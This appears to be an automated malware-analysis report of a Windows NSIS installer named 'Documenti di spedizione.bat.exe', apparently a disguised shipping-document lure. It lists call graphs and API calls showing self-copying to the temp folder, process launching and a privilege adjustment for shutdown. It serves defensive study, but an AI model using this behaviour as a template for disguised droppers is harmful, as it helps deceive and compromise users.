GetSystemDirectoryW 4255->4260 4261 4066df 15 API calls 4255->4261 4262 406811 GetWindowsDirectoryW 4255->4262 4263 4066df 15 API calls 4255->4263 4264 4068a3 lstrcatW 4255->4264 4265 406950 5 API calls 4255->4265 4267 406873 SHGetPathFromIDListW CoTaskMemFree 4255->4267 4277 406570 4255->4277 4282 406a96 GetModuleHandleA 4255->4282 4288 4065e9 wsprintfW 4255->4288 4289 4066a2 lstrcpynW 4255->4289 4256->4255 4260->4255 4261->4256 4262->4255 4263->4255 4264->4255 4265->4255 4267->4255 4269 40695d 4268->4269 4271 4069d3 4269->4271 4272 4069c6 CharNextW 4269->4272 4275 4069b2 CharNextW 4269->4275 4276 4069c1 CharNextW 4269->4276 4298 405f9e 4269->4298 4270 4069d8 CharPrevW 4270->4271 4271->4270 4273 4069f9 4271->4273 4272->4269 4272->4271 4273->4245 4275->4269 4276->4272 4291 40650f 4277->4291 4280 4065d4 4280->4255 4281 4065a4 RegQueryValueExW RegCloseKey 4281->4280 4283 406ab2 4282->4283 4284 406abc GetProcAddress 4282->4284 4295 406a26 GetSystemDirectoryW 4283->4295 4286 406acb 4284->4286 4286->4255 4287 406ab8 4287->4284 4287->4286 4288->4255 4289->4255 4290->4253 4292 40651e 4291->4292 4293 406522 4292->4293 4294 406527 RegOpenKeyExW 4292->4294 4293->4280 4293->4281 4294->4293 4296 406a48 wsprintfW LoadLibraryExW 4295->4296 4296->4287 4299 405fa4 4298->4299 4300 405fba 4299->4300 4301 405fab CharNextW 4299->4301 4300->4269 4301->4299 5652 401d82 5653 402da9 21 API calls 5652->5653 5654 401d93 SetWindowLongW 5653->5654 5655 402c4f 5654->5655 5656 401503 5657 401508 5656->5657 5658 40152e 5656->5658 5659 402da9 21 API calls 5657->5659 5659->5658 5660 402903 5661 40290b 5660->5661 5662 40290f FindNextFileW 5661->5662 5665 402921 5661->5665 5663 402968 5662->5663 5662->5665 5666 4066a2 lstrcpynW 5663->5666 5666->5665 5667 401588 5668 402bc9 5667->5668 5671 4065e9 wsprintfW 5668->5671 5670 402bce 5671->5670 4808 401389 4810 401390 4808->4810 4809 4013fe 4810->4809 4811 4013cb MulDiv SendMessageW 4810->4811 4811->4810 5679 40198d 5680 402da9 21 API calls 5679->5680 5681 401994 5680->5681 5682 402da9 21 API calls 5681->5682 5683 4019a1 5682->5683 5684 402dcb 21 API calls 5683->5684 5685 4019b8 lstrlenW 5684->5685 5686 4019c9 5685->5686 5687 401a0a 5686->5687 5691 4066a2 lstrcpynW 5686->5691 5689 4019fa 5689->5687 5690 4019ff lstrlenW 5689->5690 5690->5687 5691->5689 5692 40508e GetDlgItem GetDlgItem 5693 4050e0 7 API calls 5692->5693 5699 405305 5692->5699 5694 405187 DeleteObject 5693->5694 5695 40517a SendMessageW 5693->5695 5696 405190 5694->5696 5695->5694 5697 4051c7 5696->5697 5700 4066df 21 API calls 5696->5700 5701 404621 22 API calls 5697->5701 5698 4053e7 5702 405493 5698->5702 5707 4052f8 5698->5707 5712 405440 SendMessageW 5698->5712 5699->5698 5726 405374 5699->5726 5746 404fdc SendMessageW 5699->5746 5705 4051a9 SendMessageW SendMessageW 5700->5705 5706 4051db 5701->5706 5703 4054a5 5702->5703 5704 40549d SendMessageW 5702->5704 5714 4054b7 ImageList_Destroy 5703->5714 5715 4054be 5703->5715 5723 4054ce 5703->5723 5704->5703 5705->5696 5711 404621 22 API calls 5706->5711 5709 404688 8 API calls 5707->5709 5708 4053d9 SendMessageW 5708->5698 5713 405694 5709->5713 5727 4051ec 5711->5727 5712->5707 5717 405455 SendMessageW 5712->5717 5714->5715 5718 4054c7 GlobalFree 5715->5718 5715->5723 5716 405648 5716->5707 5721 40565a ShowWindow GetDlgItem ShowWindow 5716->5721 5720 405468 5717->5720 5718->5723 5719 4052c7 GetWindowLongW SetWindowLongW 5722 4052e0 5719->5722 5732 405479 SendMessageW 5720->5732 5721->5707 5724 4052e5 ShowWindow 5722->5724 5725 4052fd 5722->5725 5723->5716 5739 405509 5723->5739 5751 40505c 5723->5751 5744 404656 SendMessageW 5724->5744 5745 404656 SendMessageW 5725->5745 5726->5698 5726->5708 5727->5719 5728 4052c2 5727->5728 5731 40523f SendMessageW 5727->5731 5733 405291 SendMessageW 5727->5733 5734 40527d SendMessageW 5727->5734 5728->5719 5728->5722 5731->5727 5732->5702 5733->5727 5734->5727 5736 405613 5737 40561e InvalidateRect 5736->5737 5740 40562a 5736->5740 5737->5740 5738 405537 SendMessageW 5742 40554d 5738->5742 5739->5738 5739->5742 5740->5716 5760 404f97 5740->5760 5741 4055c1 SendMessageW SendMessageW 5741->5742 5742->5736 5742->5741 5744->5707 5745->5699 5747 40503b SendMessageW 5746->5747 5748 404fff GetMessagePos ScreenToClient SendMessageW 5746->5748 5749 405033 5747->5749 5748->5749 5750 405038 5748->5750 5749->5726 5750->5747 5763 4066a2 lstrcpynW 5751->5763 5753 40506f 5764 4065e9 wsprintfW 5753->5764 5755 405079 5756 40140b 2 API calls 5755->5756 5757 405082 5756->5757 5765 4066a2 lstrcpynW 5757->5765 5759 405089 5759->5739 5766 404ece 5760->5766 5762 404fac 5762->5716 5763->5753 5764->5755 5765->5759 5767 404ee7 5766->5767 5768 4066df 21 API calls 5767->5768 5769 404f4b 5768->5769 5770 4066df 21 API calls 5769->5770 5771 404f56 5770->5771 5772 4066df 21 API calls 5771->5772 5773 404f6c lstrlenW wsprintfW SetDlgItemTextW 5772->5773 5773->5762 5774 40168f 5775 402dcb 21 API calls 5774->5775 5776 401695 5775->5776 5777 4069ff 2 API calls 5776->5777 5778 40169b 5777->5778 5779 402b10 5780 402da9 21 API calls 5779->5780 5783 402b16 5780->5783 5781 4066df 21 API calls 5782 402953 5781->5782 5783->5781 5783->5782 4865 402711 4866 402da9 21 API calls 4865->4866 4867 402720 4866->4867 4868 40276a ReadFile 4867->4868 4869 402803 4867->4869 4870 406215 ReadFile 4867->4870 4871 4027aa MultiByteToWideChar 4867->4871 4872 40285f 4867->4872 4875 4027d0 SetFilePointer MultiByteToWideChar 4867->4875 4876 402870 4867->4876 4878 40285d 4867->4878 4868->4867 4868->4878 4869->4867 4869->4878 4879 406273 SetFilePointer 4869->4879 4870->4867 4871->4867 4888 4065e9 wsprintfW 4872->4888 4875->4867 4877 402891 SetFilePointer 4876->4877 4876->4878 4877->4878 4880 40628f 4879->4880 4887 4062a7 4879->4887 4881 406215 ReadFile 4880->4881 4882 40629b 4881->4882 4883 4062b0 SetFilePointer 4882->4883 4884 4062d8 SetFilePointer 4882->4884 4882->4887 4883->4884 4885 4062bb 4883->4885 4884->4887 4886 406244 WriteFile 4885->4886 4886->4887 4887->4869 4888->4878 5784 401491 5785 405727 28 API calls 5784->5785 5786 401498 5785->5786 5787 404791 lstrlenW 5788 4047b0 5787->5788 5789 4047b2 WideCharToMultiByte 5787->5789 5788->5789 5790 404b12 5791 404b3e 5790->5791 5792 404b4f 5790->5792 5851 405ce6 GetDlgItemTextW 5791->5851 5794 404b5b GetDlgItem 5792->5794 5800 404bba 5792->5800 5796 404b6f 5794->5796 5795 404b49 5798 406950 5 API calls 5795->5798 5799 404b83 SetWindowTextW 5796->5799 5803 40601c 4 API calls 5796->5803 5797 404c9e 5848 404e4d 5797->5848 5853 405ce6 GetDlgItemTextW 5797->5853 5798->5792 5804 404621 22 API calls 5799->5804 5800->5797 5805 4066df 21 API calls 5800->5805 5800->5848 5802 404688 8 API calls 5807 404e61 5802->5807 5808 404b79 5803->5808 5809 404b9f 5804->5809 5810 404c2e SHBrowseForFolderW 5805->5810 5806 404cce 5811 406079 18 API calls 5806->5811 5808->5799 5817 405f71 3 API calls 5808->5817 5812 404621 22 API calls 5809->5812 5810->5797 5813 404c46 CoTaskMemFree 5810->5813 5814 404cd4 5811->5814 5815 404bad 5812->5815 5816 405f71 3 API calls 5813->5816 5854 4066a2 lstrcpynW 5814->5854 5852 404656 SendMessageW 5815->5852 5819 404c53 5816->5819 5817->5799 5822 404c8a SetDlgItemTextW 5819->5822 5826 4066df 21 API calls 5819->5826 5821 404bb3 5824 406a96 5 API calls 5821->5824 5822->5797 5823 404ceb 5825 406a96 5 API calls 5823->5825 5824->5800 5833 404cf2 5825->5833 5827 404c72 lstrcmpiW 5826->5827 5827->5822 5830 404c83 lstrcatW 5827->5830 5828 404d33 5855 4066a2 lstrcpynW 5828->5855 5830->5822 5831 404d3a 5832 40601c 4 API calls 5831->5832 5834 404d40 GetDiskFreeSpaceW 5832->5834 5833->5828 5837 405fbd 2 API calls 5833->5837 5838 404d8b 5833->5838 5836 404d64 MulDiv 5834->5836 5834->5838 5836->5838 5837->5833 5839 404f97 24 API calls 5838->5839 5849 404dfc 5838->5849 5840 404de9 5839->5840 5843 404dfe SetDlgItemTextW 5840->5843 5844 404dee 5840->5844 5841 40140b 2 API calls 5845 404e1f 5841->5845 5843->5849 5847 404ece 24 API calls 5844->5847 5856 404643 EnableWindow 5845->5856 5846 404e3b 5846->5848 5850 404a6b SendMessageW 5846->5850 5847->5849 5848->5802 5849->5841 5849->5845 5850->5848 5851->5795 5852->5821 5853->5806 5854->5823 5855->5831 5856->5846 4889 401794 4890 402dcb 21 API calls 4889->4890 4891 40179b 4890->4891 4892 4017c3 4891->4892 4893 4017bb 4891->4893 4930 4066a2 lstrcpynW 4892->4930 4929 4066a2 lstrcpynW 4893->4929 4896 4017c1 4900 406950 5 API calls 4896->4900 4897 4017ce 4898 405f71 3 API calls 4897->4898 4899 4017d4 lstrcatW 4898->4899 4899->4896 4918 4017e0 4900->4918 4901 40181c 4903 40616d 2 API calls 4901->4903 4902 4069ff 2 API calls 4902->4918 4903->4918 4905 4017f2 CompareFileTime 4905->4918 4906 4018b2 4907 405727 28 API calls 4906->4907 4910 4018bc 4907->4910 4908 405727 28 API calls 4917 40189e 4908->4917 4909 4066a2 lstrcpynW 4909->4918 4911 403396 48 API calls 4910->4911 4912 4018cf 4911->4912 4913 4018e3 SetFileTime 4912->4913 4914 4018f5 CloseHandle 4912->4914 4913->4914 4916 401906 4914->4916 4914->4917 4915 4066df 21 API calls 4915->4918 4919 40190b 4916->4919 4920 40191e 4916->4920 4918->4901 4918->4902 4918->4905 4918->4906 4918->4909 4918->4915 4925 405d02 MessageBoxIndirectW 4918->4925 4927 401889 4918->4927 4928 406192 GetFileAttributesW CreateFileW 4918->4928 4921 4066df 21 API calls 4919->4921 4922 4066df 21 API calls 4920->4922 4923 401913 lstrcatW 4921->4923 4924 401926 4922->4924 4923->4924 4924->4917 4926 405d02 MessageBoxIndirectW 4924->4926 4925->4918 4926->4917 4927->4908 4927->4917 4928->4918 4929->4896 4930->4897 5857 73d8170d 5858 73d815b6 GlobalFree 5857->5858 5860 73d81725 5858->5860 5859 73d8176b GlobalFree 5860->5859 5861 73d81740 5860->5861 5862 73d81757 VirtualFree 5860->5862 5861->5859 5862->5859 5863 401a97 5864 402da9 21 API calls 5863->5864 5865 401aa0 5864->5865 5866 402da9 21 API calls 5865->5866 5867 401a45 5866->5867 5868 73d81000 5871 73d8101b 5868->5871 5872 73d815b6 GlobalFree 5871->5872 5873 73d81020 5872->5873 5874 73d81024 5873->5874 5875 73d81027 GlobalAlloc 5873->5875 5876 73d815dd 3 API calls 5874->5876 5875->5874 5877 73d81019 5876->5877 5878 401598 5879 4015b1 5878->5879 5880 4015a8 ShowWindow 5878->5880 5881 4015bf ShowWindow 5879->5881 5882 402c4f 5879->5882 5880->5879 5881->5882 5883 402419 5884 402dcb 21 API calls 5883->5884 5885 402428 5884->5885 5886 402dcb 21 API calls 5885->5886 5887 402431 5886->5887 5888 402dcb 21 API calls 5887->5888 5889 40243b GetPrivateProfileStringW 5888->5889 5890 40201b 5891 402dcb 21 API calls 5890->5891 5892 402022 5891->5892 5893 4069ff 2 API calls 5892->5893 5894 402028 5893->5894 5896 402039 5894->5896 5897 4065e9 wsprintfW 5894->5897 5897->5896 5898 40569b 5899 4056ab 5898->5899 5900 4056bf 5898->5900 5901 4056b1 5899->5901 5910 405708 5899->5910 5902 4056c7 IsWindowVisible 5900->5902 5908 4056de 5900->5908 5904 40466d SendMessageW 5901->5904 5905 4056d4 5902->5905 5902->5910 5903 40570d CallWindowProcW 5906 4056bb 5903->5906 5904->5906 5907 404fdc 5 API calls 5905->5907 5907->5908 5908->5903 5909 40505c 4 API calls 5908->5909 5909->5910 5910->5903 5911 401b9c 5912 402dcb 21 API calls 5911->5912 5913 401ba3 5912->5913 5914 402da9 21 API calls 5913->5914 5915 401bac wsprintfW 5914->5915 5916 402c4f 5915->5916 5917 40149e 5918 4023c2 5917->5918 5919 4014ac PostQuitMessage 5917->5919 5919->5918 5920 4016a0 5921 402dcb 21 API calls 5920->5921 5922 4016a7 5921->5922 5923 402dcb 21 API calls 5922->5923 5924 4016b0 5923->5924 5925 402dcb 21 API calls 5924->5925 5926 4016b9 MoveFileW 5925->5926 5927 4016cc 5926->5927 5933 4016c5 5926->5933 5929 4069ff 2 API calls 5927->5929 5930 40231b 5927->5930 5928 401423 28 API calls 5928->5930 5931 4016db 5929->5931 5931->5930 5932 406462 40 API calls 5931->5932 5932->5933 5933->5928 5934 404122 5935 40413a 5934->5935 5936 40429b 5934->5936 5935->5936 5937 404146 5935->5937 5938 4042ec 5936->5938 5939 4042ac GetDlgItem GetDlgItem 5936->5939 5940 404151 SetWindowPos 5937->5940 5941 404164 5937->5941 5943 404346 5938->5943 5953 401389 2 API calls 5938->5953 5942 404621 22 API calls 5939->5942 5940->5941 5945 40416d ShowWindow 5941->5945 5946 4041af 5941->5946 5947 4042d6 SetClassLongW 5942->5947 5944 40466d SendMessageW 5943->5944 5960 404296 5943->5960 5978 404358 5944->5978 5948 404259 5945->5948 5949 40418d GetWindowLongW 5945->5949 5950 4041b7 DestroyWindow 5946->5950 5951 4041ce 5946->5951 5952 40140b 2 API calls 5947->5952 5955 404688 8 API calls 5948->5955 5949->5948 5956 4041a6 ShowWindow 5949->5956 6004 4045aa 5950->6004 5957 4041d3 SetWindowLongW 5951->5957 5958 4041e4 5951->5958 5952->5938 5954 40431e 5953->5954 5954->5943 5959 404322 SendMessageW 5954->5959 5955->5960 5956->5946 5957->5960 5958->5948 5963 4041f0 GetDlgItem 5958->5963 5959->5960 5961 40140b 2 API calls 5961->5978 5962 4045ac DestroyWindow EndDialog 5962->6004 5965 404201 SendMessageW IsWindowEnabled 5963->5965 5966 40421e 5963->5966 5964 4045db ShowWindow 5964->5960 5965->5960 5965->5966 5967 404223 5966->5967 5969 40422b 5966->5969 5970 404272 SendMessageW 5966->5970 5971 40423e 5966->5971 5967->5948 5972 4045fa SendMessageW 5967->5972 5968 4066df 21 API calls 5968->5978 5969->5967 5969->5970 5970->5948 5973 404246 5971->5973 5974 40425b 5971->5974 5972->5948 5975 40140b 2 API calls 5973->5975 5976 40140b 2 API calls 5974->5976 5975->5967 5976->5967 5977 404621 22 API calls 5977->5978 5978->5960 5978->5961 5978->5962 5978->5968 5978->5977 5979 404621 22 API calls 5978->5979 5995 4044ec DestroyWindow 5978->5995 5980 4043d3 GetDlgItem 5979->5980 5981 4043f0 ShowWindow EnableWindow 5980->5981 5982 4043e8 5980->5982 6005 404643 EnableWindow 5981->6005 5982->5981 5984 40441a EnableWindow 5989 40442e 5984->5989 5985 404433 GetSystemMenu EnableMenuItem SendMessageW 5986 404463 SendMessageW 5985->5986 5985->5989 5986->5989 5988 404103 22 API calls 5988->5989 5989->5985 5989->5988 6006 404656 SendMessageW 5989->6006 6007 4066a2 lstrcpynW 5989->6007 5991 404492 lstrlenW 5992 4066df 21 API calls 5991->5992 5993 4044a8 SetWindowTextW 5992->5993 5994 401389 2 API calls 5993->5994 5994->5978 5996 404506 CreateDialogParamW 5995->5996 5995->6004 5997 404539 5996->5997 5996->6004 5998 404621 22 API calls 5997->5998 5999 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5998->5999 6000 401389 2 API calls 5999->6000 6001 40458a 6000->6001 6001->5960 6002 404592 ShowWindow 6001->6002 6003 40466d SendMessageW 6002->6003 6003->6004 6004->5960 6004->5964 6005->5984 6006->5989 6007->5991 6008 401a24 6009 402dcb 21 API calls 6008->6009 6010 401a2b 6009->6010 6011 402dcb 21 API calls 6010->6011 6012 401a34 6011->6012 6013 401a3b lstrcmpiW 6012->6013 6014 401a4d lstrcmpW 6012->6014 6015 401a41 6013->6015 6014->6015 6016 402324 6017 402dcb 21 API calls 6016->6017 6018 40232a 6017->6018 6019 402dcb 21 API calls 6018->6019 6020 402333 6019->6020 6021 402dcb 21 API calls 6020->6021 6022 40233c 6021->6022 6023 4069ff 2 API calls 6022->6023 6024 402345 6023->6024 6025 402356 lstrlenW lstrlenW 6024->6025 6026 402349 6024->6026 6028 405727 28 API calls 6025->6028 6027 405727 28 API calls 6026->6027 6029 402351 6026->6029 6027->6029 6030 402394 SHFileOperationW 6028->6030 6030->6026 6030->6029 6038 73d8103d 6039 73d8101b 5 API calls 6038->6039 6040 73d81056 6039->6040 6041 401da6 6042 401db9 GetDlgItem 6041->6042 6043 401dac 6041->6043 6045 401db3 6042->6045 6044 402da9 21 API calls 6043->6044 6044->6045 6046 401dfa GetClientRect LoadImageW SendMessageW 6045->6046 6047 402dcb 21 API calls 6045->6047 6049 401e58 6046->6049 6051 401e64 6046->6051 6047->6046 6050 401e5d DeleteObject 6049->6050 6049->6051 6050->6051 6052 4023a8 6053 4023af 6052->6053 6056 4023c2 6052->6056 6054 4066df 21 API calls 6053->6054 6055 4023bc 6054->6055 6055->6056 6057 405d02 MessageBoxIndirectW 6055->6057 6057->6056 6058 402c2a SendMessageW 6059 402c44 InvalidateRect 6058->6059 6060 402c4f 6058->6060 6059->6060 4840 4024af 4841 402dcb 21 API calls 4840->4841 4842 4024c1 4841->4842 4843 402dcb 21 API calls 4842->4843 4844 4024cb 4843->4844 4857 402e5b 4844->4857 4847 402c4f 4848 402503 4850 40250f 4848->4850 4852 402da9 21 API calls 4848->4852 4849 402dcb 21 API calls 4851 4024f9 lstrlenW 4849->4851 4853 40252e RegSetValueExW 4850->4853 4854 403396 48 API calls 4850->4854 4851->4848 4852->4850 4855 402544 RegCloseKey 4853->4855 4854->4853 4855->4847 4858 402e76 4857->4858 4861 40653d 4858->4861 4862 40654c 4861->4862 4863 4024db 4862->4863 4864 406557 RegCreateKeyExW 4862->4864 4863->4847 4863->4848 4863->4849 4864->4863 6061 402930 6062 402dcb 21 API calls 6061->6062 6063 402937 FindFirstFileW 6062->6063 6064 40295f 6063->6064 6067 40294a 6063->6067 6065 402968 6064->6065 6069 4065e9 wsprintfW 6064->6069 6070 4066a2 lstrcpynW 6065->6070 6069->6065 6070->6067 6071 401931 6072 401968 6071->6072 6073 402dcb 21 API calls 6072->6073 6074 40196d 6073->6074 6075 405dae 71 API calls 6074->6075 6076 401976 6075->6076 6077 403d32 6078 403d3d 6077->6078 6079 403d41 6078->6079 6080 403d44 GlobalAlloc 6078->6080 6080->6079 6088 401934 6089 402dcb 21 API calls 6088->6089 6090 40193b 6089->6090 6091 405d02 MessageBoxIndirectW 6090->6091 6092 401944 6091->6092 4931 4028b6 4932 4028bd 4931->4932 4935 402bce 4931->4935 4933 402da9 21 API calls 4932->4933 4934 4028c4 4933->4934 4936 4028d3 SetFilePointer 4934->4936 4936->4935 4937 4028e3 4936->4937 4939 4065e9 wsprintfW 4937->4939 4939->4935 6093 401f37 6094 402dcb 21 API calls 6093->6094 6095 401f3d 6094->6095 6096 402dcb 21 API calls 6095->6096 6097 401f46 6096->6097 6098 402dcb 21 API calls 6097->6098 6099 401f4f 6098->6099 6100 402dcb 21 API calls 6099->6100 6101 401f58 6100->6101 6102 401423 28 API calls 6101->6102 6103 401f5f 6102->6103 6110 405cc8 ShellExecuteExW 6103->6110 6105 401fa7 6106 406b41 5 API calls 6105->6106 6108 402953 6105->6108 6107 401fc4 CloseHandle 6106->6107 6107->6108 6110->6105 6111 4014b8 6112 4014be 6111->6112 6113 401389 2 API calls 6112->6113 6114 4014c6 6113->6114 6115 402fb8 6116 402fe3 6115->6116 6117 402fca SetTimer 6115->6117 6118 403031 6116->6118 6119 403037 MulDiv 6116->6119 6117->6116 6120 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 6119->6120 6120->6118 6122 401d3c 6123 402da9 21 API calls 6122->6123 6124 401d42 IsWindow 6123->6124 6125 401a45 6124->6125

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 12 40374c 5->12 8 403758-40376c call 406a26 lstrlenA 6->8 13 40376e-40378a call 406a96 * 3 8->13 12->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 26 403794 21->26 26->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 35 403830-403837 33->35 36 403829-40382e 33->36 37 403937-403951 GetTempPathW call 403634 34->37 39 403839-40383e 35->39 40 40383f-403843 35->40 36->35 36->36 44 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 37->44 45 4039a9-4039c3 DeleteFileW call 4030f5 37->45 39->40 42 403904-403913 call 405f9e 40->42 43 403849-40384f 40->43 42->32 61 403915-403916 42->61 47 403851-403858 43->47 48 403869-4038a2 43->48 44->45 64 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 44->64 66 403bb0-403bc0 call 403c82 OleUninitialize 45->66 67 4039c9-4039cf 45->67 54 40385a-40385d 47->54 55 40385f 47->55 49 4038a4-4038a9 48->49 50 4038bf-4038f9 48->50 49->50 56 4038ab-4038b3 49->56 58 403901-403903 50->58 59 4038fb-4038ff 50->59 54->48 54->55 55->48 62 4038b5-4038b8 56->62 63 4038ba 56->63 58->42 59->58 65 403925-403932 call 4066a2 59->65 61->32 62->50 62->63 63->50 64->45 64->66 65->37 77 403bc2-403bd2 call 405d02 ExitProcess 66->77 78 403be6-403bec 66->78 70 4039d5-4039e0 call 405f9e 67->70 71 403a68-403a6f call 403d74 67->71 84 4039e2-403a17 70->84 85 403a2e-403a38 70->85 80 403a74-403a78 71->80 81 403c6a-403c72 78->81 82 403bee-403c04 GetCurrentProcess OpenProcessToken 78->82 80->66 91 403c74 81->91 92 403c78-403c7c ExitProcess 81->92 87 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 82->87 88 403c3a-403c48 call 406a96 82->88 86 403a19-403a1d 84->86 89 403a3a-403a48 call 406079 85->89 90 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 85->90 94 403a26-403a2a 86->94 95 403a1f-403a24 86->95 87->88 104 403c56-403c61 ExitWindowsEx 88->104 105 403c4a-403c54 88->105 89->66 106 403a4e-403a64 call 4066a2 * 2 89->106 110 403ab4-403acc 90->110 111 403aa5-403aaf call 4066a2 90->111 91->92 94->86 99 403a2c 94->99 95->94 95->99 99->85 104->81 108 403c63-403c65 call 40140b 104->108 105->104 105->108 106->71 108->81 116 403ad1-403ad5 110->116 111->110 118 403ada-403b04 wsprintfW call 4066df 116->118 122 403b06-403b0b call 405bf6 118->122 123 403b0d call 405c50 118->123 126 403b12-403b14 122->126 123->126 128 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 126->128 129 403b16-403b20 GetFileAttributesW 126->129 137 403b71-403b92 call 406462 call 4066df call 405c85 128->137 138 403bae 128->138 130 403b41-403b4c 129->130 131 403b22-403b2b DeleteFileW 129->131 130->116 134 403b4e 130->134 131->130 133 403b2d-403b3f call 405dae 131->133 133->118 133->130 134->66 146 403b94-403b9e 137->146 147 403bd8-403be4 CloseHandle 137->147 138->66 146->138 148 403ba0-403ba8 call 4069ff 146->148 147->138 148->118 148->138
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403688
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                  • OleInitialize.OLE32(00000000), ref: 004037A3
                                                  • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037C2
                                                  • GetCommandLineW.KERNEL32(Civilisere Setup,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",00000020,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,Civilisere Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                  • wsprintfW.USER32 ref: 00403AE4
                                                  • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403B17
                                                  • DeleteFileW.KERNEL32(0042C800), ref: 00403B23
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B51
                                                    • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Documenti di spedizione.bat.exe,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B67
                                                    • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                    • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                    • Part of subcall function 004069FF: FindFirstFileW.KERNELBASE(?,00425F98,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,004060C2,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0), ref: 00406A0A
                                                    • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                  • ExitProcess.KERNEL32 ref: 00403BD2
                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BD9
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                  • ExitProcess.KERNEL32 ref: 00403C7C
                                                    • Part of subcall function 00405C50: CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                  Strings
                                                  Memory Dump Source
